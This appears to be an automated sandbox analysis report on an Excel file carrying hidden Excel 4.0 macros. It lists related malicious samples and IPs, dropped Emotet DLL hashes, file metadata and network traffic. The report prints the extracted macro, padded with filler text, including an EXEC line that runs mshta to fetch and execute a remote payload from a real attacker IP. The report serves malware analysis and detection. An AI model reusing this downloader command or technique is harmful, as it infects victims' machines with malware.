Time      Type             Description
21:07:26  API Interceptor  57x Sleep call for process: mshta.exe modified
21:07:31  API Interceptor  435x Sleep call for process: powershell.exe modified
21:07:52  API Interceptor  127x Sleep call for process: rundll32.exe modified
                                                                                                                    • 74.208.236.157
                                                                                                                    report_6.xlsGet hashmaliciousBrowse
                                                                                                                    • 74.208.236.157
                                                                                                                    comments_175343.xlsGet hashmaliciousBrowse
                                                                                                                    • 74.208.236.157
                                                                                                                    CT 7839428.xlsGet hashmaliciousBrowse
                                                                                                                    • 74.208.236.157
                                                                                                                    INFO 388968.xlsGet hashmaliciousBrowse
                                                                                                                    • 74.208.236.157
                                                                                                                    Fichier-27012022.xlsGet hashmaliciousBrowse
                                                                                                                    • 74.208.236.157
                                                                                                                    DOCUMENT-8.xlsGet hashmaliciousBrowse
                                                                                                                    • 74.208.236.157
                                                                                                                    Message 2701.xlsGet hashmaliciousBrowse
                                                                                                                    • 74.208.236.157
                                                                                                                    02L_78562.xlsGet hashmaliciousBrowse
                                                                                                                    • 74.208.236.157
                                                                                                                    untitled 667.xlsGet hashmaliciousBrowse
                                                                                                                    • 74.208.236.157
                                                                                                                    DOCUMENT_27012022.xlsGet hashmaliciousBrowse
                                                                                                                    • 74.208.236.157
                                                                                                                    message_40986562.xlsGet hashmaliciousBrowse
                                                                                                                    • 74.208.236.157
                                                                                                                    PACK-5191097.xlsGet hashmaliciousBrowse
                                                                                                                    • 74.208.236.157
                                                                                                                    PACK 628.xlsGet hashmaliciousBrowse
                                                                                                                    • 74.208.236.157
                                                                                                                    message_64956614.xlsGet hashmaliciousBrowse
                                                                                                                    • 74.208.236.157
                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                    AS-CHOOPAUSinfo_301.xlsGet hashmaliciousBrowse
                                                                                                                    • 66.42.57.149
                                                                                                                    5R5Dz9UhFae3QqksIqR.dllGet hashmaliciousBrowse
                                                                                                                    • 66.42.57.149
                                                                                                                    gqxdiBj7JLMI.dllGet hashmaliciousBrowse
                                                                                                                    • 66.42.57.149
                                                                                                                    Ylb9.dllGet hashmaliciousBrowse
                                                                                                                    • 66.42.57.149
                                                                                                                    HXYM4z2.dllGet hashmaliciousBrowse
                                                                                                                    • 66.42.57.149
                                                                                                                    W5Tmx0pFkC6A.dllGet hashmaliciousBrowse
                                                                                                                    • 66.42.57.149
                                                                                                                    w87Hl.dllGet hashmaliciousBrowse
                                                                                                                    • 66.42.57.149
                                                                                                                    zvb7uw.dllGet hashmaliciousBrowse
                                                                                                                    • 66.42.57.149
                                                                                                                    https___lastregaristorante.com_wp-admin_ffdC7ElM2Bn2_Fri_Jan_28_10_48_23_AM_CST_2022.dllGet hashmaliciousBrowse
                                                                                                                    • 66.42.57.149
                                                                                                                    https___oculusvisioncare.com_wp-includes_ZEYDjosbNExFTdu_Fri_Jan_28_10_48_26_AM_CST_2022.dllGet hashmaliciousBrowse
                                                                                                                    • 66.42.57.149
                                                                                                                    https___mypurealsystem.com_App_Start_Rhh8lKO_Fri_Jan_28_10_48_15_AM_CST_2022.dllGet hashmaliciousBrowse
                                                                                                                    • 66.42.57.149
                                                                                                                    Q_2801.xlsGet hashmaliciousBrowse
                                                                                                                    • 66.42.57.149
                                                                                                                    X_2801.xlsGet hashmaliciousBrowse
                                                                                                                    • 66.42.57.149
                                                                                                                    Mozi.m.3Get hashmaliciousBrowse
                                                                                                                    • 95.179.227.24
                                                                                                                    2026P-2801.xlsGet hashmaliciousBrowse
                                                                                                                    • 66.42.57.149
                                                                                                                    Mail_27012022.xlsGet hashmaliciousBrowse
                                                                                                                    • 66.42.57.149
                                                                                                                    gLbGdSSQmEnKdhkSLJv.dllGet hashmaliciousBrowse
                                                                                                                    • 66.42.57.149
                                                                                                                    x6eU6QrnmgTO4svU.dllGet hashmaliciousBrowse
                                                                                                                    • 66.42.57.149
                                                                                                                    MrrnzVVCORolbHHw.dllGet hashmaliciousBrowse
                                                                                                                    • 66.42.57.149
                                                                                                                    q5HvnqyamG.xlsGet hashmaliciousBrowse
                                                                                                                    • 149.248.5.128
                                                                                                                    DIGITALOCEAN-ASNUSimedpub_2.xlsGet hashmaliciousBrowse
                                                                                                                    • 162.243.175.63
                                                                                                                    imedpub_6.xlsGet hashmaliciousBrowse
                                                                                                                    • 164.90.147.135
                                                                                                                    imedpub.com_6.xlsGet hashmaliciousBrowse
                                                                                                                    • 162.243.175.63
                                                                                                                    imedpub_8.xlsGet hashmaliciousBrowse
                                                                                                                    • 164.90.147.135
                                                                                                                    imedpub.com_10.xlsGet hashmaliciousBrowse
                                                                                                                    • 162.243.175.63
                                                                                                                    iMedPub LTD_10.xlsGet hashmaliciousBrowse
                                                                                                                    • 162.243.175.63
                                                                                                                    iMedPub LTD_12.xlsGet hashmaliciousBrowse
                                                                                                                    • 162.243.175.63
                                                                                                                    iMedPub LTD_14.xlsGet hashmaliciousBrowse
                                                                                                                    • 162.243.175.63
                                                                                                                    NZW-010122 BNUV-280122.xlsmGet hashmaliciousBrowse
                                                                                                                    • 162.243.175.63
                                                                                                                    iMedPub LTD_15.xlsGet hashmaliciousBrowse
                                                                                                                    • 162.243.175.63
                                                                                                                    iMedPub LTD_2.xlsGet hashmaliciousBrowse
                                                                                                                    • 162.243.175.63
                                                                                                                    iMedPub LTD_3.xlsGet hashmaliciousBrowse
                                                                                                                    • 162.243.175.63
                                                                                                                    iMedPub LTD_7.xlsGet hashmaliciousBrowse
                                                                                                                    • 164.90.147.135
                                                                                                                    iMedPub LTD_8.xlsGet hashmaliciousBrowse
                                                                                                                    • 162.243.175.63
                                                                                                                    imedpub.xlsGet hashmaliciousBrowse
                                                                                                                    • 162.243.175.63
                                                                                                                    info_301.xlsGet hashmaliciousBrowse
                                                                                                                    • 128.199.192.135
                                                                                                                    InnovincConf_1.xlsGet hashmaliciousBrowse
                                                                                                                    • 164.90.147.135
                                                                                                                    innovinc.org.xlsGet hashmaliciousBrowse
                                                                                                                    • 164.90.147.135
                                                                                                                    ANFg7r0v2A.dllGet hashmaliciousBrowse
                                                                                                                    • 162.243.175.63
                                                                                                                    Insight Medical Publishing_10.xlsGet hashmaliciousBrowse
                                                                                                                    • 164.90.147.135
                                                                                                                    No context
                                                                                                                    No context
                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):557056
                                                                                                                    Entropy (8bit):7.004121873463284
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:6144:HUNF4UQXTkkAiBuGKDU5PSczbmOTT0DaTMG2UylbdTN1itwRClN6RfcjJxX4R0Zq:AeAa4DU5PSczbmmTzTnzyDx6BrWt
                                                                                                                    MD5:E2294F5521E781B3E691CB764C5E07AC
                                                                                                                    SHA1:3697DC13629DECE42CA0F437FB0F0A0B0FEEE174
                                                                                                                    SHA-256:358839196733595F91A4574D36DBE91706F40782137F4565FE0ED35EF4AB27BA
                                                                                                                    SHA-512:4C302A258895C3F98578FBF74FDF142B0AD3C0305C50B7B84BBC9B8703CC7CD40AED4402347F19E3049CD9E2767FC23B1E5C4C41243D8DA7BDBACC9C961D98D2
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: C:\ProgramData\QWER.dll, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                    Process:C:\Windows\System32\mshta.exe
                                                                                                                    File Type:data
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):11230
                                                                                                                    Entropy (8bit):6.174353476920402
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:192:aYVCkQn+a8Ytu3jBoYwMxsybTH8lNQwAB3fEbMH4+juo8w8q0T1fEnXAdZl+gpX:aYUkNa8ZBoYwMDXH8lNbs8BJZl+WX
                                                                                                                    MD5:3CDAF9C34211A5219808433770A34E72
                                                                                                                    SHA1:A16F4AC4AF7E46FF84E330BF50A9B6AA6A9A93EC
                                                                                                                    SHA-256:CD29D9E79ED2874B6597961173BA7EF09B5F2295CF330BFDAEFF84459EBC58FB
                                                                                                                    SHA-512:489E0C619AC80BBE287D8C9C339A11932CB8991EFBD29D536B3D45F9259D325551DF9DC6B1B38DFC4B72051CB05C856C81F9B767CE66A910FE3876927CE657C2
                                                                                                                    Malicious:false
                                                                                                                    IE Cache URL:http://91.240.118.168/qqw/aas/se.html
                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1536
                                                                                                                    Entropy (8bit):1.1464700112623651
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//:rl912N0xs+CFQXCB9Xh9Xh9X
                                                                                                                    MD5:72F5C05B7EA8DD6059BF59F50B22DF33
                                                                                                                    SHA1:D5AF52E129E15E3A34772806F6C5FBF132E7408E
                                                                                                                    SHA-256:1DC0C8D7304C177AD0E74D3D2F1002EB773F4B180685A7DF6BBE75CCC24B0164
                                                                                                                    SHA-512:6FF1E2E6B99BD0A4ED7CA8A9E943551BCD73A0BEFCACE6F1B1106E88595C0846C9BB76CA99A33266FFEC2440CF6A440090F803ABBF28B208A6C7BC6310BEB39E
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):28672
                                                                                                                    Entropy (8bit):2.664554788742027
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:768:YxsINg5+nBqmIk3hbdlylKsgqopeJBWhZFGkE+cML:YY+nBqmIk3hbdlylKsgqopeJBWhZFGk7
                                                                                                                    MD5:534B016025B9A11F0776BBE070BC9EBC
                                                                                                                    SHA1:23D5520395E4BC1DF6ADE5661554F1DD387DB5CA
                                                                                                                    SHA-256:6CE3127C861EB2D24C2CB18AD25C43FB09DC0D15AC4F9C727553C6B30D75BF3D
                                                                                                                    SHA-512:09D74BFD0E1422045B40ED37C12EE5380D319F867977725917CE16567012E25562EDDE24E7334073BB59E81DF766501B54A8FD1B9F5D7E66DF9E84BBD57D124D
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):512
                                                                                                                    Entropy (8bit):0.0
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3::
                                                                                                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):8016
                                                                                                                    Entropy (8bit):3.5787913145367445
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:96:chQCsMq/qvsqvJCwofz8hQCsMq/qvsEHyqvJCworNzj9YoHEUV+LlUVJA2:c6yofz866HnorNzjAUV+eA2
                                                                                                                    MD5:F259ABF26A431EE60FF41FFF626C8A8F
                                                                                                                    SHA1:A17ACDEB9E95318183050EFA0A629F92F2D18B19
                                                                                                                    SHA-256:D525BEFC65507F193B247DC404393739A0244D36DA52CF36F5994DA407DF436E
                                                                                                                    SHA-512:8CD16CC1CBC913182D66B305AA7BFE49D5876462F8D3354C09409C0DB5A40A7E0EB1F6589C3FAAB5C4B4F9556EF1B42909E788699BF7A586584EFA9A005154D0
                                                                                                                    Malicious:false
                                                                                                                    Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S#...Programs..f.......:...S#.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                    File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: xXx, Last Saved By: xXx, Name of Creating Application: Microsoft Excel, Create Time/Date: Wed Jan 26 22:33:31 2022, Last Saved Time/Date: Wed Jan 26 22:36:27 2022, Security: 0
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):77312
                                                                                                                    Entropy (8bit):5.832187394303654
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:1536:mY+nBqmIk3hbdlylKsgqopeJBWhZFGkE+cMLxAAIiQ5gQ72IotO6nitSUPU+8T:mY+nBqmIk3hbdlylKsgqopeJBWhZFGk9
                                                                                                                    MD5:5A8D06254A21564A530C4DB0FD8F05EE
                                                                                                                    SHA1:AA978D7E1D16EEA905CD0437792FC2E1EA0D3820
                                                                                                                    SHA-256:CBA8647ACD3FD4BB26675A129D8820A59ADA2B9CBF146FA422908C3B9BD9834F
                                                                                                                    SHA-512:9DF6D818DDABBA220D96598E7C2CBB7A2B3733DD6C65CF7E281735DEC024B334ED08802A38E2E94A6F4460AFF2CEC443512D74FFC2E69F3939C66C8E4B1C8679
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: SUSP_Excel4Macro_AutoOpen, Description: Detects Excel4 macro use with auto open / close, Source: C:\Users\user\Desktop\DETAILS-145.xls, Author: John Lambert @JohnLaTwC
                                                                                                                    • Rule: JoeSecurity_XlsWithMacro4, Description: Yara detected Xls With Macro 4.0, Source: C:\Users\user\Desktop\DETAILS-145.xls, Author: Joe Security
                                                                                                                    • Rule: INDICATOR_OLE_Excel4Macros_DL2, Description: Detects OLE Excel 4 Macros documents acting as downloaders, Source: C:\Users\user\Desktop\DETAILS-145.xls, Author: ditekSHen
                                                                                                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................ZO..........................\.p....user B.....a.........=.............................................=........p.08.......X.@...........".......................1..................C.a.l.i.b.r.i.1..................C.a.l.i.b.r.i.1..................C.a.l.i.b.r.i.1..................C.a.l.i.b.r.i.1..................C.a.l.i.b.r.i.1.*.h...6..........C.a.l.i.b.r.i. .L.i.g.h.t.
                                                                                                                    Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):557056
                                                                                                                    Entropy (8bit):7.004121873463284
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:6144:HUNF4UQXTkkAiBuGKDU5PSczbmOTT0DaTMG2UylbdTN1itwRClN6RfcjJxX4R0Zq:AeAa4DU5PSczbmmTzTnzyDx6BrWt
                                                                                                                    MD5:E2294F5521E781B3E691CB764C5E07AC
                                                                                                                    SHA1:3697DC13629DECE42CA0F437FB0F0A0B0FEEE174
                                                                                                                    SHA-256:358839196733595F91A4574D36DBE91706F40782137F4565FE0ED35EF4AB27BA
                                                                                                                    SHA-512:4C302A258895C3F98578FBF74FDF142B0AD3C0305C50B7B84BBC9B8703CC7CD40AED4402347F19E3049CD9E2767FC23B1E5C4C41243D8DA7BDBACC9C961D98D2
                                                                                                                    Malicious:false
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......hs.a,..2,..2,..2...2&..2...27..2,..2...2...26..2...2...2...2...2...2-..2...2-..2...2-..2Rich,..2................PE..L......a...........!.....P... ...............`......................................]...............................@-..R...4...........Pv................... ..0N......................................@............`..........@....................text...9E.......P.................. ..`.rdata.......`.......`..............@..@.data....e...0...0...0..............@....rsrc...Pv...........`..............@..@.reloc..v.... ......................@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                    File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: xXx, Last Saved By: xXx, Name of Creating Application: Microsoft Excel, Create Time/Date: Wed Jan 26 22:33:31 2022, Last Saved Time/Date: Wed Jan 26 22:36:27 2022, Security: 0
                                                                                                                    Entropy (8bit):5.819847251992515
                                                                                                                    TrID:
                                                                                                                    • Microsoft Excel sheet (30009/1) 78.94%
                                                                                                                    • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                                                                                                    File name:DETAILS-145.xls
                                                                                                                    File size:77529
                                                                                                                    MD5:c15231bf03d2cde2f5d16665421d03a1
                                                                                                                    SHA1:e552fc97c08d64ac0d17c4cebf428665982600ed
                                                                                                                    SHA256:107833427623de2638b3514e51ac1241be3911cccc699e8603c7146755356bd9
                                                                                                                    SHA512:c84cedca77089327b3b19997d0b9823933c4461ed5a5d96deebb6221a9aa8a9a83c0e80c8269ccdea223ca0b08a2313d8a76b8a7afd001354ea43f2fd187b379
                                                                                                                    SSDEEP:1536:xY+nBqmIk3hbdlylKsgqopeJBWhZFGkE+cMLxAAIiQ5gQ72IotO6nitSUPU+8:xY+nBqmIk3hbdlylKsgqopeJBWhZFGkZ
                                                                                                                    Icon Hash:e4eea286a4b4bcb4
                                                                                                                    Document Type:OLE
                                                                                                                    Number of OLE Files:1
                                                                                                                    Has Summary Info:True
                                                                                                                    Application Name:Microsoft Excel
                                                                                                                    Encrypted Document:False
                                                                                                                    Contains Word Document Stream:False
                                                                                                                    Contains Workbook/Book Stream:True
                                                                                                                    Contains PowerPoint Document Stream:False
                                                                                                                    Contains Visio Document Stream:False
                                                                                                                    Contains ObjectPool Stream:
                                                                                                                    Flash Objects Count:
                                                                                                                    Contains VBA Macros:True
                                                                                                                    Code Page:1251
                                                                                                                    Author:xXx
                                                                                                                    Last Saved By:xXx
                                                                                                                    Create Time:2022-01-26 22:33:31
                                                                                                                    Last Saved Time:2022-01-26 22:36:27
                                                                                                                    Creating Application:Microsoft Excel
                                                                                                                    Security:0
                                                                                                                    Document Code Page:1251
                                                                                                                    Thumbnail Scaling Desired:False
                                                                                                                    Company:
                                                                                                                    Contains Dirty Links:False
                                                                                                                    Shared Document:False
                                                                                                                    Changed Hyperlinks:False
                                                                                                                    Application Version:1048576
                                                                                                                    General
                                                                                                                    Stream Path:\x5DocumentSummaryInformation
                                                                                                                    File Type:data
                                                                                                                    Stream Size:4096
                                                                                                                    Entropy:0.347239233907
                                                                                                                    Base64 Encoded:False
                                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T i m e C a r d . . . . . S h e e t 1 . . . . . M a c r o 1 . . . . . . . . . . . . . . . . . W o r k s h e e
                                                                                                                    General
                                                                                                                    Stream Path:\x5SummaryInformation
                                                                                                                    File Type:data
                                                                                                                    Stream Size:4096
                                                                                                                    Entropy:0.264984368025
                                                                                                                    Base64 Encoded:False
                                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x X x . . . . . . . . . x X x . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . / . . . . . . @ . . . . . . ' . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                    General
                                                                                                                    Stream Path:Workbook
                                                                                                                    File Type:Applesoft BASIC program data, first line number 16
                                                                                                                    Stream Size:67009
                                                                                                                    Entropy:6.37385915268
                                                                                                                    Base64 Encoded:True
                                                                                                                    Data ASCII:. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . x X x B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . p . 0 8 . . . . . . . X . @ . . . . . . . . . . . " . . . . . . .
                                                                                                                    Name:Macro1
                                                                                                                    Type:3
                                                                                                                    Final:False
                                                                                                                    Visible:False
                                                                                                                    Protected:False
Macro1 | 3 | False | 0 | False | post
1,10,' Lose away off why half led have near bed. At engage simple father of period others except. My giving do summer of though narrow marked at. Spring formal no county ye waited. My whether cheered at regular it of promise blushes perhaps. Uncommonly simplicity interested mr is be compliment projecting my inhabiting. Gentleman he september in oh excellent.
3,10,' On on produce colonel pointed. Just four sold need over how any. In to september suspicion determine he prevailed admitting. On adapted an as affixed limited on. Giving cousin warmly things no spring mr be abroad. Relation breeding be as repeated strictly followed margaret. One gravity son brought shyness waiting regular led ham.
5,10,' Supported neglected met she therefore unwilling discovery remainder. Way sentiments two indulgence uncommonly own. Diminution to frequently sentiments he connection continuing indulgence. An my exquisite conveying up defective. Shameless see the tolerably how continued. She enable men twenty elinor points appear. Whose merry ten yet was men seven ought balls.
7,10,' Now eldest new tastes plenty mother called misery get. Longer excuse for county nor except met its things. Narrow enough sex moment desire are. Hold who what come that seen read age its. Contained or estimable earnestly so perceived. Imprudence he in sufficient cultivated. Delighted promotion improving acuteness an newspaper offending he. Misery in am secure theirs giving an. Design on longer thrown oppose am.
8,10,' Lose away off why half led have near bed. At engage simple father of period others except. My giving do summer of though narrow marked at. Spring formal no county ye waited. My whether cheered at regular it of promise blushes perhaps. Uncommonly simplicity interested mr is be compliment projecting my inhabiting. Gentleman he september in oh excellent.
10,10,' On on produce colonel pointed. Just four sold need over how any. In to september suspicion determine he prevailed admitting. On adapted an as affixed limited on. Giving cousin warmly things no spring mr be abroad. Relation breeding be as repeated strictly followed margaret. One gravity son brought shyness waiting regular led ham.
12,10,' Supported neglected met she therefore unwilling discovery remainder. Way sentiments two indulgence uncommonly own. Diminution to frequently sentiments he connection continuing indulgence. An my exquisite conveying up defective. Shameless see the tolerably how continued. She enable men twenty elinor points appear. Whose merry ten yet was men seven ought balls.
14,10,' Now eldest new tastes plenty mother called misery get. Longer excuse for county nor except met its things. Narrow enough sex moment desire are. Hold who what come that seen read age its. Contained or estimable earnestly so perceived. Imprudence he in sufficient cultivated. Delighted promotion improving acuteness an newspaper offending he. Misery in am secure theirs giving an. Design on longer thrown oppose am.
16,10,' In post mean shot ye. There out her child sir his lived. Design at uneasy me season of branch on praise esteem. Abilities discourse believing consisted remaining to no. Mistaken no me denoting dashwood as screened. Whence or esteem easily he on. Dissuade husbands at of no if disposal.
18,10,' Excited him now natural saw passage offices you minuter. At by asked being court hopes. Farther so friends am to detract. Forbade concern do private be. Offending residence but men engrossed shy. Pretend am earnest offered arrived company so on. Felicity informed yet had admitted strictly how you.
19,10,=EXEC("cmd /c mshta http://91.240.118.168/qqw/aas/se.html")
25,10,=HALT()
                                                                                                                    Name:Macro1
                                                                                                                    Type:3
                                                                                                                    Final:False
                                                                                                                    Visible:False
                                                                                                                    Protected:False
Macro1 | 3 | False | 0 | False | pre
1,10,' Lose away off why half led have near bed. At engage simple father of period others except. My giving do summer of though narrow marked at. Spring formal no county ye waited. My whether cheered at regular it of promise blushes perhaps. Uncommonly simplicity interested mr is be compliment projecting my inhabiting. Gentleman he september in oh excellent.
3,10,' On on produce colonel pointed. Just four sold need over how any. In to september suspicion determine he prevailed admitting. On adapted an as affixed limited on. Giving cousin warmly things no spring mr be abroad. Relation breeding be as repeated strictly followed margaret. One gravity son brought shyness waiting regular led ham.
5,10,' Supported neglected met she therefore unwilling discovery remainder. Way sentiments two indulgence uncommonly own. Diminution to frequently sentiments he connection continuing indulgence. An my exquisite conveying up defective. Shameless see the tolerably how continued. She enable men twenty elinor points appear. Whose merry ten yet was men seven ought balls.
7,10,' Now eldest new tastes plenty mother called misery get. Longer excuse for county nor except met its things. Narrow enough sex moment desire are. Hold who what come that seen read age its. Contained or estimable earnestly so perceived. Imprudence he in sufficient cultivated. Delighted promotion improving acuteness an newspaper offending he. Misery in am secure theirs giving an. Design on longer thrown oppose am.
8,10,' Lose away off why half led have near bed. At engage simple father of period others except. My giving do summer of though narrow marked at. Spring formal no county ye waited. My whether cheered at regular it of promise blushes perhaps. Uncommonly simplicity interested mr is be compliment projecting my inhabiting. Gentleman he september in oh excellent.
10,10,' On on produce colonel pointed. Just four sold need over how any. In to september suspicion determine he prevailed admitting. On adapted an as affixed limited on. Giving cousin warmly things no spring mr be abroad. Relation breeding be as repeated strictly followed margaret. One gravity son brought shyness waiting regular led ham.
12,10,' Supported neglected met she therefore unwilling discovery remainder. Way sentiments two indulgence uncommonly own. Diminution to frequently sentiments he connection continuing indulgence. An my exquisite conveying up defective. Shameless see the tolerably how continued. She enable men twenty elinor points appear. Whose merry ten yet was men seven ought balls.
14,10,' Now eldest new tastes plenty mother called misery get. Longer excuse for county nor except met its things. Narrow enough sex moment desire are. Hold who what come that seen read age its. Contained or estimable earnestly so perceived. Imprudence he in sufficient cultivated. Delighted promotion improving acuteness an newspaper offending he. Misery in am secure theirs giving an. Design on longer thrown oppose am.
16,10,' In post mean shot ye. There out her child sir his lived. Design at uneasy me season of branch on praise esteem. Abilities discourse believing consisted remaining to no. Mistaken no me denoting dashwood as screened. Whence or esteem easily he on. Dissuade husbands at of no if disposal.
18,10,' Excited him now natural saw passage offices you minuter. At by asked being court hopes. Farther so friends am to detract. Forbade concern do private be. Offending residence but men engrossed shy. Pretend am earnest offered arrived company so on. Felicity informed yet had admitted strictly how you.
19,10,=EXEC("cmd /c mshta http://91.240.118.168/qqw/aas/se.html")
25,10,=HALT()
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
01/28/22-21:08:00.606825 | TCP | 2034631 | ET TROJAN Maldoc Activity (set) | 49168 | 80 | 192.168.2.22 | 91.240.118.168
                                                                                                                    Jan 28, 2022 21:08:02.242753029 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.242796898 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.248161077 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.248181105 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.248224020 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.253652096 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.253676891 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.253724098 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.259076118 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.259095907 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.259145021 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.264477015 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.264498949 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.264540911 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.269893885 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.269916058 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.269979954 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.275182962 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.275203943 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.275255919 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.280381918 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.280401945 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.280477047 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.286808014 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.286833048 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.287388086 CET4917080192.168.2.2274.208.236.157
